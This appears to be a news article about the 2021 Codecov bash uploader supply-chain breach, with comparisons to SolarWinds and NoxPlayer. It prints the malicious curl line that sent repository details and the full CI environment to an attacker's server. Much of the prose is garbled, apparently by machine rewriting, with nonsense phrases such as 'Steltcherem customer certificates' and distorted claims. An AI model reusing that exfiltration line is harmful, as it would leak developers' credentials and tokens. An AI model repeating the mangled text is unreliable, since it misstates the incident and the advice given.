A publicly available software development kit contains malicious code that steals authentication credentials that applications need to access suspicious resources. It’s the latest manifestation of a supply chain attack that has the potential to disrupt the networks of countless organizations.
Developer Codecov bash at the back door from the end of January to the beginning of April, the developers of the tool said on Thursday. The backdoor allows the developer’s computers to send private identifiers and other sensitive data to a remote site controlled by hackers. The loader works with development platforms as well Github Actions, CircleCIwe had Bitrise Stepsall of which support having such secret identifiers in the development environment.
Heap of AWS and other cloud certifications
The Codecov bash compiler makes what is known as a code environment for large software development projects. It allows developers to submit community reports that, among other things, determine how much the codebase has been tested by internal test scripts. Some development projects integrate Codecov and similar third-party services into their platforms, where there is free access to sensitive credentials that can be used to steal or change the source code.
Code similar to this single line first appeared on January 31:
curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” || true
The code sent both the GitHub repository location and the entire process environment to a remote site, which has been redacted because Codecov says it’s part of an ongoing federal investigation. These types of domains usually store tokens, certificates, and other secrets for software in Amazon Web Services or GitHub.
Armed with these secrets, there is no shortage of malicious things an attacker can do to development communities that rely on the tool, said HD Moore, security expert and CEO of the Rumble network discovery platform.
“It really depends on what’s in the environment, but from the point where the attackers have access (via the bash loader), they may have been able to plant backdoors on systems where it runs,” he wrote in the message directly with Ars. . “For GitHub/CircleCI, this would have exposed most source code and credentials.”
Moore continued:
The attackers can end up with a bunch of AWS and other cloud credentials in addition to tokens that can give them access to private repositories, which include source code but also everything else that the token has give permission for. At the end of the scale, these certificates will be self-use that uses the stolen source code, which steals Steltcherem customer certificates, etc. The same can be applied to awspes and decorations another color. If credentials are allowed, they can enable infrastructure acquisition, data access, file access, etc.
In Wednesday’s advisory, Codecov said a malicious version of the bash loader could access:
- Any certificates, tokens, or keys that our clients pass through their CI (continuous integration) runner will be accessed when the bash script is executed.
- Any services, databases, and application code that you may access with credentials, tokens, or keys
- Remote git information (URL of origin repository) of repositories using bash loaders to upload environment to Codecov in CI
“Based on the results of forensic research to date, it appears that periodic unauthorized access to a Google Cloud Storage key began on January 31, 2021, which allowed a malicious third party to modify a version if the bash loader script is available for exportable information subject to constant integration to a third-party server,” said Codecov. “Codecov secured and corrected the script on April 1, 2021.”
Codecov’s advisory says a bug in Codecov’s Docker image creation process allowed a hacker to remove the certificate needed to modify the bash loader script.
The exploit was discovered on April 1 by a customer who noticed that the shasum used as a digital fingerprint to verify the integrity of the bash installer did not match the shasum for a version downloaded from a customer to Codecov, and the tool maker pull the ugly version and start an investigation.
Codecov urges anyone who uses a bash update during the affected period to revoke all existing certificates, tokens, or keys in CI processes and create new ones. Developers can determine what keys and tokens are stored in the CI environment by enabling them env command in CI Pipeline. Whatever you feel should be considered offensive.
Additionally, anyone using a locally saved version of the bash loader should check for the following:
Curl -sm 0.5 -d “$(git remote -v)
If these commands appear anywhere in the locally stored bash loader, users should immediately replace the loader with the latest version from
Codecov says that developers using the self-hosted version of the bash update are unlikely to be affected. “To take effect, your CI pipeline will need to take the bash loader from instead of a self-hosted Codecov installation. You can verify from where you’re taking the bash loader by looking at your CI pipeline configuration,” the company said.
The appeal of the supply chain remains
The announcement of Codecov’s software development and distribution system is the latest supply chain attack to come to light. In December, a similar deal hit SolarWinds, an Austin, Texas maker of network management tools used by about 300,000 organizations around the world, including Fortune 500 companies and government agencies.
The hackers who committed the breach then shared the update externally after it was downloaded by 18,000 customers. About 10 U.S. federal agencies and 100 private companies eventually received the tracking payloads that sent sensitive information to attack control servers. FireEye, Microsoft, Mimecast, and Malwarebytes were all taken up in the campaign.
Recently, hackers attacked the software supply chain used to install malware on people’s computers using NoxPlayer, a software package that emulates the Android operating system on PCs and Macs, essentially so that users can mobile game on those platforms. . The backdoor version of NoxPlayer is available for five months, researchers from ESET said.
The appeal of supply chain attacks to hackers is their breadth and effectiveness. By copying a player that is superior in providing software, hackers can infect any person or organization that uses the infected product. Another feature that hackers see an advantage in: often little or nothing the targets can do to detect malicious software distributed in this way because the digital signatures will prove to be legitimate.
In the case of the updated bash version of the backend, however, it would have been easy for Codecov or any of its clients to detect the malware by doing nothing more than scanning the shasum. The ability for a malicious species to escape notice for three months indicates that no one bothered to make this simple diagnosis.
People who have applied the bash update between January 31 and April 1 should carefully check their developers for signs of compromise by following the steps outlined in Wednesday’s advisory.